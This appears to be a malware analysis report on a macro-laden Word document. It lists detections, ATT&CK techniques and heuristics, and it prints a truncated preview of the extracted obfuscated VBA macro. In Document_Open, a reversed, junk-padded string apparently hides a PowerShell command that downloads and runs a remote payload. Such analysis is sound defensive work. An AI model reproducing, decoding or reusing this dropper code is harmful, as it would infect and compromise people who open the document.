MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a Microsoft Office document containing VBA macros. The 'Document_Open' macro is present and utilizes the 'Shell()' function, indicating an attempt to execute arbitrary code. This is further supported by the ClamAV detection name 'Doc.Malware.Chronos-6897935-0'. The VBA script is heavily obfuscated, but the presence of the Shell() call strongly suggests it's designed to download and execute a secondary payload.
Heuristics 6
-
ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 35112 bytes |
SHA-256: 29577c42cb439e71f05d6c457a5aba3c307a9446e4d498b906649270f6e034ad |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function QnmDmO(PRKYACt As Boolean, AscHte As String, Rdmnizt As Double, zhNugCw As String, sLFHjt As Double) As String
For RKORbT = 0 To 179
QvRvxD = "&RW$AK@.mQ@$c" + "QcECkv mNcj%AMdvXzk*" + "ifZ&N?gLp[FQE"
ZmWsxAie = 1183 - 204 - 318
UDJgLmS = 1981 + 847 + 528
hKbOL = "Hd?Il^j?J ycJ" + "&pkd.*nYI ]g" + "FhvVxGTYeSGXkcMf"
UDJgLmS = UCase("vDoMciiP@#C")
XiKxvL = Left("kO&nD@DGaXhL", 5)
wYIbIDx = 812 + 110 + 1194
Next RKORbT
uDIjkz = 918 - 607 - 696
wYIbIDx = 958 - 993 - 720
OUqwXt = UCase("R-wEE(G(itI%Cf&")
QvRvxD = 1025 + 189 + 935
OiydRlwA = 1977 + 242 + 1883
OiydRlwA = "BOjx(QJqI?bX^&Vz!&" + "ldAU&_iND^^" + "[VEkLWQ.zHEr"
hKbOL = 161 + 1503 + 1476
For jkIfoL = 0 To 188
QvRvxD = UCase("BkIHIlS_P*nHX")
wYIbIDx = 475 + 661 + 219
zDflzEy = Right("g-iCmQuNQR", 2)
OiydRlwA = RTrim("EMFzJ$aOXKu#-LAHBy")
hKbOL = Right("ESIlnmz?FKuNph", 2)
uDIjkz = UCase(" ]iFkBuhQZu")
hKbOL = StrReverse("pxC pkJ$r?DW)KsBr$hg")
ZmWsxAie = LTrim("wa_pbBzg%CAfF")
wYIbIDx = Right("pOs!R^s(j^I%yX", 4)
Next jkIfoL
OiydRlwA = 110 - 868 - 348
wYIbIDx = "olOA_qvBAf_^J%V!" + "D#LVjRM!Ga" + "oWoU?vUf[fFbsV]?"
hKbOL = StrReverse("Lrd]MFJ[#sKf")
uDIjkz = "Ips(W^aT^]$Qy" + "hNUY^r@z#JIgn@" + "Uu-e(MQrF%F_"
OiydRlwA = StrReverse("hTxHGmY%DJ](bM")
OUqwXt = 673 - 770 - 323
wYIbIDx = RTrim("EXvC$DCfYG")
OUqwXt = 713 - 666 - 309
hKbOL = Right("BVFUp@TjiT)JxfBL%", 3)
UDJgLmS = RTrim("h &$v$GbXot")
OiydRlwA = RTrim("UZXb#SbDWTtY_")
QnmDmO = "BEQBIdjkDSSgdbEmOrgO"
End Function
Private Sub Document_Open()
Dim mLCUMDm As String
While duDGjG < 394
hKbOL = 854 + 565 + 807
OiydRlwA = RTrim("TR%iC scngQHjgEl&D")
duDGjG = duDGjG + 3
Wend
ZmWsxAie = Space(8)
uDIjkz = Right("]TW#Hj^Pt]AjLt#Wc", 5)
While TojUin < 207
UDJgLmS = Right(".ms&E?fjnkCp", 3)
hKbOL = RTrim("P@CBtb!$nKw(&n")
QvRvxD = LTrim("rPOI@ufYFmifk")
QvRvxD = Space(7)
uDIjkz = UCase("X$In&(MwoX")
TojUin = TojUin + 3
Wend
uDIjkz = 1618 + 359 + 1825
For mpTWaE = 0 To 315
qIsgt = 1950 - 1602 - 1155
OUqwXt = 1673 - 1156 - 1201
Next mpTWaE
hKbOL = Left("?wsUR@pZq-vqo", 3)
uDIjkz = 356 + 1844 + 1966
OUqwXt = Right("zxR-_nf%r]gIjjzvbxM", 5)
UDJgLmS = StrReverse("C_idZogDbMkt")
qIsgt = Space(7)
OiydRlwA = "ZYPlZ_@?fLDl&" + "mEdYZ(wuyYjIu$UibCV" + "zLW&c?D &A$zVn*B_PR"
wYIbIDx = 1458 + 1256 + 785
qIsgt = UCase("JORILxHG.cA!]y.AtP")
qIsgt = StrReverse("IB&(]]u!FIKPx")
OiydRlwA = 1101 + 337 + 1729
mLCUMDm = StrReverse("z;$'beaxWel.uWaN?Q*PEnm\_\c%RpXmSe@tE%#'A DsvsHeYcHonrnPC-dtWrYaatgSZ;^)J'(eWxuer.-WVNYQ!Pyn#\^\r%%pQmJebtn%_'U,L'^eqxme@.se%pJoGh_/#mTotcX.Ynba?i$gAenlOach.kzoulfe!hTt@/o/g:spLtXtth#'s(%eDl]i.FVdEa?oPlKnywEobDP.@)StonkegiSlcC#bXe^W@.Yt$eMN(.mmreBtHsiyMSQ ltwc-ecj*bYOT-xwVefNP(h hsCslaXpfyKbn Gp%eJ-w vlxldeShJsrrDeLwbovpc Ce]xhe(.ClslGe$hMs%rYeLwZocp")
XiKxvL = 314 - 1693 - 1808
XiKxvL = RTrim("f$p@DSEy-j$m L.")
zDflzEy = LTrim("^Uz.rtCjDZvB")
ZmWsxAie = LTrim("Z^yDN%^Y_@Tc^%lggd")
OUqwXt = "jr-PnNlDKLiguetJ%" + "xhziS#u^@Gzu_mPIhkR" + "xLLlY(%KbQ)C"
QvRvxD = Right("y-ju(@qNOvD^", 3)
uDIjkz = LTrim("yDzu^$e%%!LJ")
zDflzEy = 105 - 1049 - 398
uDIjkz = 409 - 126 - 552
zDflzEy = "b Oc?V#D)KoVftpe" + "xx?Ou!RsBdbL.oNd(A&c" + "V&PlacVP Y]Q"
QvRvxD = Right("XRXC^P ixSx-^", 2)
QvRvxD = RTrim("I-hNhkmdAyjr%Dve")
For iZXAqF = 0 To 310
zDflzEy = Space(2)
wYIbIDx = StrReverse("E$
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.